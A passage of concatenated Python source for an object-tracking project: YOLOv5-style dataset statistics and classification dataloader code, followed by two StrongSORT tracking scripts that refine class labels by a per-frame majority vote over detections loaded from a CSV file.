stats.get_json(save=False)
stats.process_images()
"""
def __init__(self, path='coco128.yaml', autodownload=False):
# Initialize class
zipped, data_dir, yaml_path = self._unzip(Path(path))
try:
with open(check_yaml(yaml_path), errors='ignore') as f:
data = yaml.safe_load(f) # data dict
if zipped:
data['path'] = data_dir
except Exception as e:
raise Exception("error/HUB/dataset_stats/yaml_load") from e
check_dataset(data, autodownload) # download dataset if missing
self.hub_dir = Path(data['path'] + '-hub')
self.im_dir = self.hub_dir / 'images'
self.im_dir.mkdir(parents=True, exist_ok=True) # makes /images
self.stats = {'nc': data['nc'], 'names': list(data['names'].values())} # statistics dictionary
self.data = data
@staticmethod
def _find_yaml(dir):
# Return data.yaml file
files = list(dir.glob('*.yaml')) or list(dir.rglob('*.yaml')) # try root level first and then recursive
assert files, f'No *.yaml file found in {dir}'
if len(files) > 1:
files = [f for f in files if f.stem == dir.stem] # prefer *.yaml files that match dir name
assert files, f'Multiple *.yaml files found in {dir}, only 1 *.yaml file allowed'
assert len(files) == 1, f'Multiple *.yaml files found: {files}, only 1 *.yaml file allowed in {dir}'
return files[0]
def _unzip(self, path):
# Unzip data.zip
if not str(path).endswith('.zip'): # path is data.yaml
return False, None, path
assert Path(path).is_file(), f'Error unzipping {path}, file not found'
unzip_file(path, path=path.parent)
dir = path.with_suffix('') # dataset directory == zip name
assert dir.is_dir(), f'Error unzipping {path}, {dir} not found. path/to/abc.zip MUST unzip to path/to/abc/'
return True, str(dir), self._find_yaml(dir) # zipped, data_dir, yaml_path
def _hub_ops(self, f, max_dim=1920):
# HUB ops for 1 image 'f': resize and save at reduced quality in /dataset-hub for web/app viewing
f_new = self.im_dir / Path(f).name # dataset-hub image filename
try: # use PIL
im = Image.open(f)
r = max_dim / max(im.height, im.width) # ratio
if r < 1.0: # image too large
im = im.resize((int(im.width * r), int(im.height * r)))
im.save(f_new, 'JPEG', quality=50, optimize=True) # save
except Exception as e: # use OpenCV
LOGGER.info(f'WARNING ⚠️ HUB ops PIL failure {f}: {e}')
im = cv2.imread(f)
im_height, im_width = im.shape[:2]
r = max_dim / max(im_height, im_width) # ratio
if r < 1.0: # image too large
im = cv2.resize(im, (int(im_width * r), int(im_height * r)), interpolation=cv2.INTER_AREA)
cv2.imwrite(str(f_new), im)
def get_json(self, save=False, verbose=False):
# Return dataset JSON for Ultralytics HUB
def _round(labels):
            # Update labels to integer class and 4 decimal place floats
return [[int(c), *(round(x, 4) for x in points)] for c, *points in labels]
for split in 'train', 'val', 'test':
if self.data.get(split) is None:
self.stats[split] = None # i.e. no test set
continue
dataset = LoadImagesAndLabels(self.data[split]) # load dataset
x = np.array([
np.bincount(label[:, 0].astype(int), minlength=self.data['nc'])
for label in tqdm(dataset.labels, total=dataset.n, desc='Statistics')]) # shape(128x80)
self.stats[split] = {
'instance_stats': {
'total': int(x.sum()),
'per_class': x.sum(0).tolist()},
'image_stats': {
'total': dataset.n,
'unlabelled': int(np.all(x == 0, 1).sum()),
'per_class': (x > 0).sum(0).tolist()},
'labels': [{
str(Path(k).name): _round(v.tolist())} for k, v in zip(dataset.im_files, dataset.labels)]}
# Save, print and return
if save:
stats_path = self.hub_dir / 'stats.json'
print(f'Saving {stats_path.resolve()}...')
with open(stats_path, 'w') as f:
json.dump(self.stats, f) # save stats.json
if verbose:
print(json.dumps(self.stats, indent=2, sort_keys=False))
return self.stats
def process_images(self):
# Compress images for Ultralytics HUB
for split in 'train', 'val', 'test':
if self.data.get(split) is None:
continue
dataset = LoadImagesAndLabels(self.data[split]) # load dataset
desc = f'{split} images'
for _ in tqdm(ThreadPool(NUM_THREADS).imap(self._hub_ops, dataset.im_files), total=dataset.n, desc=desc):
pass
print(f'Done. All images saved to {self.im_dir}')
return self.im_dir
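# Illustrative shape of the dictionary built by HUBDatasetStats.get_json() (values below are hypothetical):
# {
#   'nc': 80, 'names': ['person', 'bicycle', ...],
#   'train': {'instance_stats': {'total': 929, 'per_class': [...]},
#             'image_stats': {'total': 128, 'unlabelled': 0, 'per_class': [...]},
#             'labels': [{'000000000009.jpg': [[45, 0.4794, 0.6416, 0.9076, 0.5875], ...]}, ...]},
#   'val': {...}, 'test': None
# }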
# Classification dataloaders -------------------------------------------------------------------------------------------
class ClassificationDataset(torchvision.datasets.ImageFolder):
"""
YOLOv5 Classification Dataset.
Arguments
root: Dataset path
transform: torchvision transforms, used by default
album_transform: Albumentations transforms, used if installed
"""
def __init__(self, root, augment, imgsz, cache=False):
super().__init__(root=root)
self.torch_transforms = classify_transforms(imgsz)
self.album_transforms = classify_albumentations(augment, imgsz) if augment else None
self.cache_ram = cache is True or cache == 'ram'
self.cache_disk = cache == 'disk'
self.samples = [list(x) + [Path(x[0]).with_suffix('.npy'), None] for x in self.samples] # file, index, npy, im
def __getitem__(self, i):
f, j, fn, im = self.samples[i] # filename, index, filename.with_suffix('.npy'), image
if self.cache_ram and im is None:
im = self.samples[i][3] = cv2.imread(f)
elif self.cache_disk:
            if not fn.exists():  # write the .npy cache on first access
np.save(fn.as_posix(), cv2.imread(f))
im = np.load(fn)
else: # read image
im = cv2.imread(f) # BGR
if self.album_transforms:
sample = self.album_transforms(image=cv2.cvtColor(im, cv2.COLOR_BGR2RGB))["image"]
else:
sample = self.torch_transforms(im)
return sample, j
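# Minimal usage sketch (hypothetical path): cache='ram' keeps decoded images in memory, while cache='disk'
# writes a .npy copy next to each image so later epochs can skip JPEG decoding.
#   ds = ClassificationDataset(root='datasets/imagenette/train', augment=True, imgsz=224, cache='disk')
#   sample, cls_idx = ds[0]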
def create_classification_dataloader(path,
imgsz=224,
batch_size=16,
augment=True,
cache=False,
rank=-1,
workers=8,
shuffle=True):
# Returns Dataloader object to be used with YOLOv5 Classifier
with torch_distributed_zero_first(rank): # init dataset *.cache only once if DDP
dataset = ClassificationDataset(root=path, imgsz=imgsz, augment=augment, cache=cache)
batch_size = min(batch_size, len(dataset))
nd = torch.cuda.device_count()
nw = min([os.cpu_count() // max(nd, 1), batch_size if batch_size > 1 else 0, workers])
sampler = None if rank == -1 else distributed.DistributedSampler(dataset, shuffle=shuffle)
generator = torch.Generator()
generator.manual_seed(6148914691236517205 + RANK)
return InfiniteDataLoader(dataset,
batch_size=batch_size,
shuffle=shuffle and sampler is None,
num_workers=nw,
sampler=sampler,
pin_memory=PIN_MEMORY,
worker_init_fn=seed_worker,
generator=generator) # or DataLoader(persistent_workers=True)
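# Minimal usage sketch (hypothetical path; rank=-1 means no DistributedSampler is attached):
#   loader = create_classification_dataloader('datasets/imagenette/train', imgsz=224, batch_size=64,
#                                             augment=True, cache=False, rank=-1, workers=8, shuffle=True)
#   for ims, labels in loader:
#       ...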
# ======================================================================
# Refinement_module.py  (TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/Refinement_module.py)
# ======================================================================
import argparse
import os
# limit the number of cpus used by high performance libraries
os.environ["OMP_NUM_THREADS"] = "1"
os.environ["OPENBLAS_NUM_THREADS"] = "1"
os.environ["MKL_NUM_THREADS"] = "1"
os.environ["VECLIB_MAXIMUM_THREADS"] = "1"
os.environ["NUMEXPR_NUM_THREADS"] = "1"
import glob
import os
import platform
import random
import re
import subprocess
import time
from pathlib import Path
import cv2
import numpy as np
import pandas as pd
import torch
import sys
import numpy as np
from pathlib import Path
import torch
import torch.backends.cudnn as cudnn
from numpy import random
from time import time
FILE = Path(__file__).resolve()
ROOT = FILE.parents[0] # yolov5 strongsort root directory
WEIGHTS = ROOT / 'weights' # default model.pt path
if str(ROOT) not in sys.path:
sys.path.append(str(ROOT)) # add ROOT to PATH
if str(ROOT / 'yolov7') not in sys.path:
    sys.path.append(str(ROOT / 'yolov7'))  # add yolov7 ROOT to PATH
if str(ROOT / 'strong_sort') not in sys.path:
sys.path.append(str(ROOT / 'strong_sort')) # add strong_sort ROOT to PATH
ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative
from ultralytics.utils.torch_utils import select_device, time_sync
from datasets import LoadImages, LoadStreams
from ultralytics.data.loaders import LoadImagesAndVideos, LoadStreams
from ultralytics.utils import colorstr
from ultralytics.utils.checks import check_file, check_requirements, check_imshow
from ultralytics.utils.ops import non_max_suppression, scale_coords
from ultralytics.utils.plotting import save_one_box
import cv2
from strong_sort.utils.parser import get_config
from strong_sort.strong_sort import StrongSORT
VID_FORMATS = 'asf', 'avi', 'gif', 'm4v', 'mkv', 'mov', 'mp4', 'mpeg', 'mpg', 'ts', 'wmv' # include video suffixes
def strip_optimizer(f='best.pt', s=''): # from utils.general import *; strip_optimizer()
# Strip optimizer from 'f' to finalize training, optionally save as 's'
x = torch.load(f, map_location=torch.device('cpu'))
if x.get('ema'):
x['model'] = x['ema'] # replace model with ema
for k in 'optimizer', 'training_results', 'wandb_id', 'ema', 'updates': # keys
x[k] = None
x['epoch'] = -1
x['model'].half() # to FP16
for p in x['model'].parameters():
p.requires_grad = False
torch.save(x, s or f)
mb = os.path.getsize(s or f) / 1E6 # filesize
print(f"Optimizer stripped from {f},{(' saved as %s,' % s) if s else ''} {mb:.1f}MB")
def increment_path(path, exist_ok=True, sep=''):
# Increment path, i.e. runs/exp --> runs/exp{sep}0, runs/exp{sep}1 etc.
path = Path(path) # os-agnostic
if (path.exists() and exist_ok) or (not path.exists()):
return str(path)
else:
dirs = glob.glob(f"{path}{sep}*") # similar paths
matches = [re.search(rf"%s{sep}(\d+)" % path.stem, d) for d in dirs]
i = [int(m.groups()[0]) for m in matches if m] # indices
n = max(i) + 1 if i else 2 # increment number
return f"{path}{sep}{n}" # update path
def isdocker():
# Is environment a Docker container
return Path('/workspace').exists() # or Path('/.dockerenv').exists()
def emojis(str=''):
# Return platform-dependent emoji-safe version of string
return str.encode().decode('ascii', 'ignore') if platform.system() == 'Windows' else str
def plot_one_box(x, img, color=None, label=None, line_thickness=3):
# Plots one bounding box on image img
tl = line_thickness or round(0.002 * (img.shape[0] + img.shape[1]) / 2) + 1 # line/font thickness
color = color or [random.randint(0, 255) for _ in range(3)]
c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3]))
cv2.rectangle(img, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA)
if label:
tf = max(tl - 1, 1) # font thickness
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3
cv2.rectangle(img, c1, c2, color, -1, cv2.LINE_AA) # filled
cv2.putText(img, label, (c1[0], c1[1] - 2), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
def track_and_refine_classes(outputs, threshold):
refined_labels = {}
    # outputs is a list of detection tuples; each tuple contains:
    # (x_min, y_min, x_max, y_max, track_id, class_label, confidence)
    # i.e. outputs holds all tracked detections for the current frame
if len(outputs) > 0:
class_counts = {}
total_detections = len(outputs)
for detection in outputs:
# print(detection)
class_label = detection[5]
if class_label not in class_counts:
class_counts[class_label] = 1
else:
class_counts[class_label] += 1
# Determine the majority class and refine labels if necessary
if class_counts:
majority_class = max(class_counts, key=class_counts.get)
majority_frequency = class_counts[majority_class] / total_detections
if majority_frequency >= threshold:
for detection in outputs:
track_id = detection[4]
refined_labels[track_id] = majority_class
return refined_labels
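# Worked example with hypothetical values: three tracked detections in one frame, two labelled class 2
# and one labelled class 7.
#   outputs = [(10, 20, 50, 80, 1, 2, 0.9),
#              (12, 22, 52, 82, 2, 2, 0.8),
#              ( 5,  5, 40, 60, 3, 7, 0.6)]
#   track_and_refine_classes(outputs, threshold=0.5)  # class 2 covers 2/3 >= 0.5 of the frame
#   # -> {1: 2, 2: 2, 3: 2}   every track id in the frame is re-labelled to the majority class
# Note that this variant votes over the whole frame at once, not per track id.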
@torch.no_grad()
def run(
source= '0',
        yolo_weights=WEIGHTS / 'yolov8.pt',  # model.pt path(s); detections come from CSV here, but kept for run naming and --update
strong_sort_weights=WEIGHTS / 'osnet_x0_25_msmt17.pt', # model.pt path,
config_strongsort=ROOT / 'strong_sort/configs/strong_sort.yaml',
imgsz=(640, 640), # inference size (height, width)
conf_thres=0.25, # confidence threshold
iou_thres=0.45, # NMS IOU threshold
max_det=1000, # maximum detections per image
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
show_vid=False, # show results
save_txt=False, # save results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_crop=False, # save cropped prediction boxes
        save_vid=False,  # save video tracking results
nosave=False, # do not save images/videos
classes=None, # filter by class: --class 0, or --class 0 2 3
agnostic_nms=False, # class-agnostic NMS
augment=False, # augmented inference
visualize=False, # visualize features
update=False, # update all models
project=ROOT / 'runs/track', # save results to project/name
name='exp', # save results to project/name
exist_ok=False, # existing project/name ok, do not increment
line_thickness=3, # bounding box thickness (pixels)
hide_labels=False, # hide labels
hide_conf=False, # hide confidences
hide_class=False, # hide IDs
half=False, # use FP16 half-precision inference
dnn=False, # use OpenCV DNN for ONNX inference
refinement_enabled=True, # flag to enable or disable refinement
refinement_threshold=0.5, # threshold for refining class labels
):
source = str(source)
save_img = not nosave and not source.endswith('.txt') # save inference images
is_file = Path(source).suffix[1:] in (VID_FORMATS)
is_url = source.lower().startswith(('rtsp://', 'rtmp://', 'http://', 'https://'))
webcam = source.isnumeric() or source.endswith('.txt') or (is_url and not is_file)
if is_url and is_file:
source = check_file(source) # download
# # Directories
if not isinstance(yolo_weights, list): # single yolo model
exp_name = yolo_weights.stem
elif type(yolo_weights) is list and len(yolo_weights) == 1: # single models after --yolo_weights
exp_name = Path(yolo_weights[0]).stem
yolo_weights = Path(yolo_weights[0])
else: # multiple models after --yolo_weights
exp_name = 'ensemble'
exp_name = name if name else exp_name + "_" + strong_sort_weights.stem
save_dir = increment_path(Path(project) / exp_name, exist_ok=exist_ok) # increment run
save_dir = Path(save_dir)
(save_dir / 'tracks' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# # Load model
device = select_device(device)
detection_df = pd.read_csv('detection_results.csv') # load detection results from csv file in format (video_id,frame_id,x_min, y_min, x_max, y_max, class_label,confidence)
detection_df = detection_df.sort_values(by=['video_id', 'frame_id'])
detection_df = detection_df.reset_index(drop=True)
detection_df['track_id'] = -1
names = detection_df['class_label'].unique() # class names
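    # Hypothetical example of the expected CSV layout (one row per detection):
    #   video_id,frame_id,x_min,y_min,x_max,y_max,class_label,confidence
    #   1,0,104.0,212.5,340.0,480.0,2,0.91
    #   1,0,400.2,180.0,455.7,260.3,7,0.64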
# WEIGHTS.mkdir(parents=True, exist_ok=True)
# stride = model.stride.max().cpu().numpy() # model stride
# imgsz = check_img_size(imgsz[0], s=stride) # check image size
# Dataloader
if webcam:
show_vid = check_imshow()
cudnn.benchmark = True # set True to speed up constant image size inference
dataset = LoadStreams(source, img_size=imgsz)
nr_sources = len(dataset.sources)
else:
dataset = LoadImagesAndVideos(source)
nr_sources = 1
vid_path, vid_writer, txt_path = [None] * nr_sources, [None] * nr_sources, [None] * nr_sources
# initialize StrongSORT
cfg = get_config()
cfg.merge_from_file(opt.config_strongsort)
# Create as many strong sort instances as there are video sources
strongsort_list = []
for i in range(nr_sources):
strongsort_list.append(
StrongSORT(
strong_sort_weights,
device,
half,
max_dist=cfg.STRONGSORT.MAX_DIST,
max_iou_distance=cfg.STRONGSORT.MAX_IOU_DISTANCE,
max_age=cfg.STRONGSORT.MAX_AGE,
n_init=cfg.STRONGSORT.N_INIT,
nn_budget=cfg.STRONGSORT.NN_BUDGET,
mc_lambda=cfg.STRONGSORT.MC_LAMBDA,
ema_alpha=cfg.STRONGSORT.EMA_ALPHA,
)
)
strongsort_list[i].model.warmup()
outputs = [None] * nr_sources
colors = [[random.randint(0, 255) for _ in range(3)] for _ in names] # track colors for each class label
# Run tracking
dt, seen = [0.0, 0.0, 0.0, 0.0], 0
curr_frames, prev_frames = [None] * nr_sources, [None] * nr_sources
# Initialize variables for FPS calculation
start_time = time()
frames_processed = 0
# for frame_idx, (path, im, im0, vid_cap) in enumerate(dataset):
    for frame_idx, (path, im0s, infos) in enumerate(dataset):  # LoadImagesAndVideos yields (paths, images, info) per batch
if time() - start_time >= 1: # every second
# Calculate FPS
fps = frames_processed / (time() - start_time)
print(f'FPS: {fps:.2f}')
start_time = time()
frames_processed = 0 #
# Increment the number of frames processed
frames_processed += 1
s = ''
t1 = time_sync()
# infos has string in format (f"video {self.count + 1}/{self.nf} (frame {self.frame}/{self.frames}) {path}: ")
        # get video id and frame id from infos using regex
video_id = int(re.search(r'video (\d+)', infos).group(1))
frame_id = int(re.search(r'frame (\d+)', infos).group(1))
print(f'Processing video {video_id} frame {frame_id}')
# get detections for the current frame for the current video
        pred = detection_df[(detection_df['frame_id'] == frame_id) & (detection_df['video_id'] == video_id)]  # parentheses required: & binds tighter than ==
t2 = time_sync()
dt[0] += t2 - t1
# Apply NMS
t3 = time_sync()
if pred is not None and len(pred):
pred = non_max_suppression(pred, conf_thres, iou_thres, classes, agnostic_nms, max_det=max_det)
t4 = time_sync()
dt[1] += t4 - t3
# Process detections
for i, det in enumerate(pred): # detections per image
# txt_file_name = p.stem if not webcam else p.stem + f'_{i}' # Differentiate text file names for multiple videos
# save_path = str(save_dir / p.stem) if not webcam else str(save_dir / p.stem) + f'_{i}' # Differentiate video save paths for multiple videos
seen += 1
if webcam: # nr_sources >= 1
p, im0, _ = path[i], im0s[i].copy(), dataset.count
p = Path(p) # to Path
s += f'{i}: '
txt_file_name = p.name
save_path = str(save_dir / p.name) + str(i) # im.jpg, vid.mp4, ...
else:
p, im0, _ = path, im0s.copy(), getattr(dataset, 'frame', 0)
p = Path(p) # to Path
# video file
if source.endswith(VID_FORMATS):
txt_file_name = p.stem
save_path = str(save_dir / p.name) # im.jpg, vid.mp4, ...
# folder with imgs
else:
txt_file_name = p.name.split('.')[0] # get folder name containing current img
save_path = str(save_dir / p.name) # im.jpg, vid.mp4, ...
curr_frames[i] = im0
txt_path = str(save_dir / 'tracks' / txt_file_name) # im.txt
            s += '%gx%g ' % im0.shape[:2]  # print string (frame height x width)
imc = im0.copy() if save_crop else im0 # for save_crop
if cfg.STRONGSORT.ECC: # camera motion compensation
strongsort_list[i].tracker.camera_update(prev_frames[i], curr_frames[i])
if det is not None and len(det):
# # Rescale boxes from img_size to im0 size
# det[:, :4] = scale_coords(im.shape[2:], det[:, :4], im0.shape).round()
# # Print results
# for c in det[:, -1].unique():
# n = (det[:, -1] == c).sum() # detections per class
# s += f"{n} {names[int(c)]}{'s' * (n > 1)}, " # add to string
xywhs = det.boxes.xywh
confs = det.boxes.conf
clss = det.boxes.cls
# pass detections to strongsort
t4 = time_sync()
outputs[i] = strongsort_list[i].update(xywhs.cpu(), confs.cpu(), clss.cpu(), im0)
t5 = time_sync()
dt[3] += t5 - t4
if refinement_enabled:
refined_labels = track_and_refine_classes( outputs[i], refinement_threshold)
# draw boxes for visualization
if len(outputs[i]) > 0:
for j, (output, conf) in enumerate(zip(outputs[i], confs)):
bboxes = output[0:4]
id = output[4]
cls = output[5]
# update class label if refinement is enabled
if refinement_enabled:
                            cls = refined_labels.get(id, cls)  # keep the original class if this track was not refined
if save_txt:
# Append index to differentiate text files for multiple videos
bbox_left = output[0]
bbox_top = output[1]
bbox_w = output[2] - output[0]
bbox_h = output[3] - output[1]
txt_path = str(save_dir / 'tracks' / (txt_file_name + f'_{i}.txt'))
with open(txt_path, 'a') as file:
file.write(f'{p.stem} {frame_idx} {id} {bbox_left} {bbox_top} {bbox_w} {bbox_h} {conf:.2f} {cls}\n')
# if save_txt:
# # to MOT format
# bbox_left = output[0]
# bbox_top = output[1]
# bbox_w = output[2] - output[0]
# bbox_h = output[3] - output[1]
# # format video_name frame id xmin ymin width height score class
# with open(txt_path + '.txt', 'a') as file:
# file.write(f'{p.stem} {frame_idx} {id} {bbox_left} {bbox_top} {bbox_w} {bbox_h} {conf:.2f} {cls}\n')
if save_vid or save_crop or show_vid: # Add bbox to image
c = int(cls) # integer class
id = int(id) # integer id
label = None if hide_labels else (f'{id} {names[c]}' if hide_conf else \
(f'{id} {conf:.2f}' if hide_class else f'{id} {names[c]} {conf:.2f}'))
plot_one_box(bboxes, im0, label=label, color=colors[int(cls)], line_thickness=2)
print(f'{s}Done. YOLO:({t3 - t2:.3f}s), StrongSORT:({t5 - t4:.3f}s)')
else:
strongsort_list[i].increment_ages()
print('No detections')
# Stream results
if show_vid:
cv2.imshow(str(p), im0)
cv2.waitKey(1) # 1 millisecond
# Save results (image with detections)
if save_img:
if dataset.mode == 'image':
cv2.imwrite(save_path, im0)
else: # 'video' or 'stream'
if vid_path[i] != save_path: # new video
vid_path[i] = save_path
if isinstance(vid_writer[i], cv2.VideoWriter):
vid_writer[i].release() # release previous video writer
if vid_cap: # video
fps = vid_cap.get(cv2.CAP_PROP_FPS)
w = int(vid_cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(vid_cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
else: # stream
fps, w, h = 30, im0.shape[1], im0.shape[0]
save_path = str(Path(save_path).with_suffix('.mp4')) # force *.mp4 suffix on results videos
vid_writer[i] = cv2.VideoWriter(save_path, cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h))
vid_writer[i].write(im0)
prev_frames[i] = curr_frames[i]
# Print results
t = tuple(x / seen * 1E3 for x in dt) # speeds per image
print(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS, %.1fms strong sort update per image at shape {(1, 3, imgsz, imgsz)}' % t)
if save_txt or save_vid:
s = f"\n{len(list(save_dir.glob('tracks/*.txt')))} tracks saved to {save_dir / 'tracks'}" if save_txt else ''
print(f"Results saved to {colorstr('bold', save_dir)}{s}")
if update:
strip_optimizer(yolo_weights) # update model (to fix SourceChangeWarning)
def parse_opt():
parser = argparse.ArgumentParser()
parser.add_argument('--yolo-weights', nargs='+', type=str, default=WEIGHTS / 'yolov7.pt', help='model.pt path(s)')
parser.add_argument('--strong-sort-weights', type=str, default=WEIGHTS / 'osnet_x0_25_msmt17.pt')
parser.add_argument('--config-strongsort', type=str, default='strong_sort/configs/strong_sort.yaml')
parser.add_argument('--source', type=str, default='0', help='file/dir/URL/glob, 0 for webcam')
parser.add_argument('--imgsz', '--img', '--img-size', nargs='+', type=int, default=[640], help='inference size h,w')
parser.add_argument('--conf-thres', type=float, default=0.5, help='confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.5, help='NMS IoU threshold')
parser.add_argument('--max-det', type=int, default=1000, help='maximum detections per image')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--show-vid', action='store_true', help='display tracking video results')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-crop', action='store_true', help='save cropped prediction boxes')
parser.add_argument('--save-vid', action='store_true', help='save video tracking results')
parser.add_argument('--nosave', action='store_true', help='do not save images/videos')
    # class 0 is person, 1 is bicycle, 2 is car... 79 is oven
parser.add_argument('--classes', nargs='+', type=int, help='filter by class: --classes 0, or --classes 0 2 3')
parser.add_argument('--agnostic-nms', action='store_true', help='class-agnostic NMS')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--visualize', action='store_true', help='visualize features')
parser.add_argument('--update', action='store_true', help='update all models')
parser.add_argument('--project', default=ROOT / 'runs/track', help='save results to project/name')
parser.add_argument('--name', default='exp', help='save results to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--line-thickness', default=3, type=int, help='bounding box thickness (pixels)')
parser.add_argument('--hide-labels', default=False, action='store_true', help='hide labels')
parser.add_argument('--hide-conf', default=False, action='store_true', help='hide confidences')
parser.add_argument('--hide-class', default=False, action='store_true', help='hide IDs')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
parser.add_argument('--dnn', action='store_true', help='use OpenCV DNN for ONNX inference')
opt = parser.parse_args()
opt.imgsz *= 2 if len(opt.imgsz) == 1 else 1 # expand
return opt
def main(opt):
check_requirements(requirements=ROOT / 'requirements.txt', exclude=('tensorboard', 'thop'))
run(**vars(opt))
if __name__ == "__main__":
opt = parse_opt()
main(opt)
# ======================================================================
# Refinement_trackv8.py  (TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/Refinement_trackv8.py)
# ======================================================================
import argparse
import os
# limit the number of cpus used by high performance libraries
os.environ["OMP_NUM_THREADS"] = "1"
os.environ["OPENBLAS_NUM_THREADS"] = "1"
os.environ["MKL_NUM_THREADS"] = "1"
os.environ["VECLIB_MAXIMUM_THREADS"] = "1"
os.environ["NUMEXPR_NUM_THREADS"] = "1"
import glob
import os
import platform
import random
import re
import subprocess
import time
from pathlib import Path
import cv2
import numpy as np
import pandas as pd
import torch
import sys
import numpy as np
from pathlib import Path
import torch
import torch.backends.cudnn as cudnn
from numpy import random
from time import time
from ultralytics import YOLO
FILE = Path(__file__).resolve()
ROOT = FILE.parents[0] # yolov5 strongsort root directory
WEIGHTS = ROOT / 'weights'
if str(ROOT) not in sys.path:
sys.path.append(str(ROOT)) # add ROOT to PATH
if str(ROOT / 'yolov7') not in sys.path:
    sys.path.append(str(ROOT / 'yolov7'))  # add yolov7 ROOT to PATH
if str(ROOT / 'strong_sort') not in sys.path:
sys.path.append(str(ROOT / 'strong_sort')) # add strong_sort ROOT to PATH
ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative
from ultralytics.utils.torch_utils import select_device, time_sync
from datasets import LoadImages, LoadStreams
from ultralytics.utils import colorstr
from ultralytics.utils.checks import check_file, check_requirements, check_imshow
from ultralytics.utils.ops import non_max_suppression, scale_coords
from ultralytics.utils.plotting import save_one_box
import cv2
from strong_sort.utils.parser import get_config
from strong_sort.strong_sort import StrongSORT
VID_FORMATS = 'asf', 'avi', 'gif', 'm4v', 'mkv', 'mov', 'mp4', 'mpeg', 'mpg', 'ts', 'wmv' # include video suffixes
def strip_optimizer(f='best.pt', s=''): # from utils.general import *; strip_optimizer()
# Strip optimizer from 'f' to finalize training, optionally save as 's'
x = torch.load(f, map_location=torch.device('cpu'))
if x.get('ema'):
x['model'] = x['ema'] # replace model with ema
for k in 'optimizer', 'training_results', 'wandb_id', 'ema', 'updates': # keys
x[k] = None
x['epoch'] = -1
x['model'].half() # to FP16
for p in x['model'].parameters():
p.requires_grad = False
torch.save(x, s or f)
mb = os.path.getsize(s or f) / 1E6 # filesize
print(f"Optimizer stripped from {f},{(' saved as %s,' % s) if s else ''} {mb:.1f}MB")
def increment_path(path, exist_ok=True, sep='', mkdir=False):
    # Increment path, i.e. runs/exp --> runs/exp{sep}0, runs/exp{sep}1 etc.
    path = Path(path)  # os-agnostic
    if (path.exists() and exist_ok) or (not path.exists()):
        result = path
    else:
        dirs = glob.glob(f"{path}{sep}*")  # similar paths
        matches = [re.search(rf"%s{sep}(\d+)" % path.stem, d) for d in dirs]
        i = [int(m.groups()[0]) for m in matches if m]  # indices
        n = max(i) + 1 if i else 2  # increment number
        result = Path(f"{path}{sep}{n}")  # update path
    if mkdir:
        Path(result).mkdir(parents=True, exist_ok=True)  # create the directory when requested (used by --visualize)
    return str(result)
def isdocker():
# Is environment a Docker container
return Path('/workspace').exists() # or Path('/.dockerenv').exists()
def emojis(str=''):
# Return platform-dependent emoji-safe version of string
return str.encode().decode('ascii', 'ignore') if platform.system() == 'Windows' else str
def plot_one_box(x, img, color=None, label=None, line_thickness=3):
# Plots one bounding box on image img
tl = line_thickness or round(0.002 * (img.shape[0] + img.shape[1]) / 2) + 1 # line/font thickness
color = color or [random.randint(0, 255) for _ in range(3)]
c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3]))
cv2.rectangle(img, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA)
if label:
tf = max(tl - 1, 1) # font thickness
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3
cv2.rectangle(img, c1, c2, color, -1, cv2.LINE_AA) # filled
cv2.putText(img, label, (c1[0], c1[1] - 2), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
def track_and_refine_classes(outputs, threshold):
refined_labels = {}
    # outputs is a list of detection tuples; each tuple contains:
    # (x_min, y_min, x_max, y_max, track_id, class_label, confidence)
    # i.e. outputs holds all tracked detections for the current frame
if len(outputs) > 0:
class_counts = {}
total_detections = len(outputs)
for detection in outputs:
# print(detection)
class_label = detection[5]
if class_label not in class_counts:
class_counts[class_label] = 1
else:
class_counts[class_label] += 1
# Determine the majority class and refine labels if necessary
if class_counts:
majority_class = max(class_counts, key=class_counts.get)
majority_frequency = class_counts[majority_class] / total_detections
if majority_frequency >= threshold:
for detection in outputs:
track_id = detection[4]
refined_labels[track_id] = majority_class
return refined_labels
@torch.no_grad()
def run(
source= '0',
yolo_weights=WEIGHTS / 'yolov8.pt', # model.pt path(s),
strong_sort_weights=WEIGHTS / 'osnet_x0_25_msmt17.pt', # model.pt path,
config_strongsort=ROOT / 'strong_sort/configs/strong_sort.yaml',
imgsz=(640, 640), # inference size (height, width)
conf_thres=0.25, # confidence threshold
iou_thres=0.45, # NMS IOU threshold
max_det=1000, # maximum detections per image
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
show_vid=False, # show results
save_txt=False, # save results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_crop=False, # save cropped prediction boxes
        save_vid=False,  # save video tracking results
nosave=False, # do not save images/videos
classes=None, # filter by class: --class 0, or --class 0 2 3
agnostic_nms=False, # class-agnostic NMS
augment=False, # augmented inference
visualize=False, # visualize features
update=False, # update all models
project=ROOT / 'runs/track', # save results to project/name
name='exp', # save results to project/name
exist_ok=False, # existing project/name ok, do not increment
line_thickness=3, # bounding box thickness (pixels)
